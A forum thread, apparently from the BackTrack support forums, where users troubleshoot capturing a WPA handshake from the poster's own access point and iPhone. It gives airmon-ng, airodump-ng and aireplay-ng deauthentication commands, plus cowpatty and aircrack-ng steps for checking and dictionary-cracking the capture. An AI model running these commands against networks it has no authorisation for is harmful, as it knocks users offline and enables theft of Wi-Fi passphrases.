Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: can't manage to get this damn handshake

  1. #1
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    4

    Default can't manage to get this damn handshake

    hi :

    OS : backtrack4
    card : alfa 500
    AP : livebox (french popular AP) in the room next to mine
    station : my iphone, on my desk

    shell 1 :

    iwconfig :i can see that my card is wlan0
    airmon-ng wlan0 start : now she is called mon0
    airodump-ng mon0 : i can see a lot of network, mine is on channel 10
    CTRL+C
    airodump-ng -w out -c 10 --bssid XX:XX:XX:XX:XX:XX mon0 : targeting my network
    shell 2

    aireplay-ng -0 0 -a XX:XX:XX:XX:XX:XX mon0
    waiting a couple of seconds, i can see my iphone being disconnected, CTRL+C to stop the dehaut attack
    my iphone is reconnecting

    no handshake

    tried more than 10 time, i have evn disconnected and reconnected manualy my iphone and tried to do it with a regular laptop instead of my iphone (you never know, apple could be using some weird handshake)

    still no handshake

    could you look at my capture file? : Index of /backtrack4/wpa

    thanks

  2. #2
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    4

    Default Re: can't manage to get this damn handshake

    problem solved :

    airodump and aircrack do not like apple handshack
    i've tried with a laptop and i can get this handshake

    but fot my iphone, airodump say no handshake, but if you use cowpatty, you'll see it

  3. #3
    Senior Member hypervista's Avatar
    Join Date
    Feb 2010
    Posts
    121

    Default Re: can't manage to get this damn handshake

    sliders_alpha - it appears you have a good WPA handshake in that file. Run the following command:

    Code:
    cowpatty -c -r out-01.cap
    You will see the message: "Collected all necessary data to mount crack against WPA/PSK passphrase."

    Sometimes, airodump-ng doesn't always display "WPA Handshake Captured" message.

    You should run aircrack-ng or cowpatty on your out-01.cap file to see if you can break the passphrase. Way to go, you're almost there.

  4. #4
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    4

    Default Re: can't manage to get this damn handshake

    hypervista how can you tell whether a handshake it's good or not? I'm using Wireshark to open the out-01.cap file that sliders_alpha posted. On which packet you find the information required to know if the packet it's good


    thanks

  5. #5
    Junior Member
    Join Date
    Apr 2010
    Posts
    30

    Default Re: can't manage to get this damn handshake

    I found that this command help med catching those handshakes

    aireplay-ng -0 30 -a (BSSID) -c (STATION MAC ADDRESS) Interface (e.g wlan0)

    -0 (deauth attack)
    30 (30 times)

    PS.

    Might be enough with -0 5 as well...

    Good luck

  6. #6
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    4

    Default Re: can't manage to get this damn handshake

    it worked

    i made a "false" dictionnary with my key inside and it found it

    thank you

  7. #7
    Senior Member hypervista's Avatar
    Join Date
    Feb 2010
    Posts
    121

    Default Re: can't manage to get this damn handshake

    Quote Originally Posted by hurtincho04 View Post
    hypervista how can you tell whether a handshake it's good or not? I'm using Wireshark to open the out-01.cap file that sliders_alpha posted. On which packet you find the information required to know if the packet it's good

    thanks
    using cowpatty, you can determine if the .cap file has all the necessary information needed to mount a dictionary attack.

    Code:
    cowpatty -c -r <capture_file_name.cap>
    The output of this command will tell you whether you got the WPA handshake or not.

    Interestingly though, as sliders pointed out, when I ran aircrack-ng against the file, it reported that no WPA handshake was present, but cowpatty recognized it...

  8. #8
    Junior Member
    Join Date
    Apr 2010
    Posts
    30

    Default Re: can't manage to get this damn handshake

    Very interesting observation, found several times that aircrack-ng did not recconize the handshake. So next time Ill be sure to try cowpatty.

    Thank you

  9. #9
    Good friend of the forums gunrunr's Avatar
    Join Date
    Jan 2010
    Location
    shining my spoon
    Posts
    265

    Default Re: can't manage to get this damn handshake

    can you just check the cap file with Wireshark and use the eapol filter to make sure the both sides of the handshake are there?

  10. #10
    Senior Member hypervista's Avatar
    Join Date
    Feb 2010
    Posts
    121

    Default Re: can't manage to get this damn handshake

    Quote Originally Posted by gunrunr View Post
    can you just check the cap file with Wireshark and use the eapol filter to make sure the both sides of the handshake are there?
    Sure, but I'm lazy and prefer typing one simple cowpatty command as opposed to firing up wireshark, creating a filter, and reading the individual packets, but that's just me.

Page 1 of 2 12 LastLast

Similar Threads

  1. Best way to manage WEP and WPA keys
    By drearp in forum OLD BackTrack 4 General Support
    Replies: 4
    Last Post: 08-16-2009, 06:37 PM
  2. help a newb please!!damn wifi!!
    By oreokoookizz in forum OLD Newbie Area
    Replies: 0
    Last Post: 09-06-2008, 08:15 PM
  3. cant manage to install BT3 successfully
    By rh-penguin in forum OLD BT3beta General
    Replies: 3
    Last Post: 01-20-2008, 04:14 AM
  4. damn conexant chip!
    By morphic in forum OLD Newbie Area
    Replies: 5
    Last Post: 07-07-2007, 10:04 AM
  5. manage the console bugger
    By soliko in forum OLD Newbie Area
    Replies: 1
    Last Post: 03-07-2007, 07:37 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •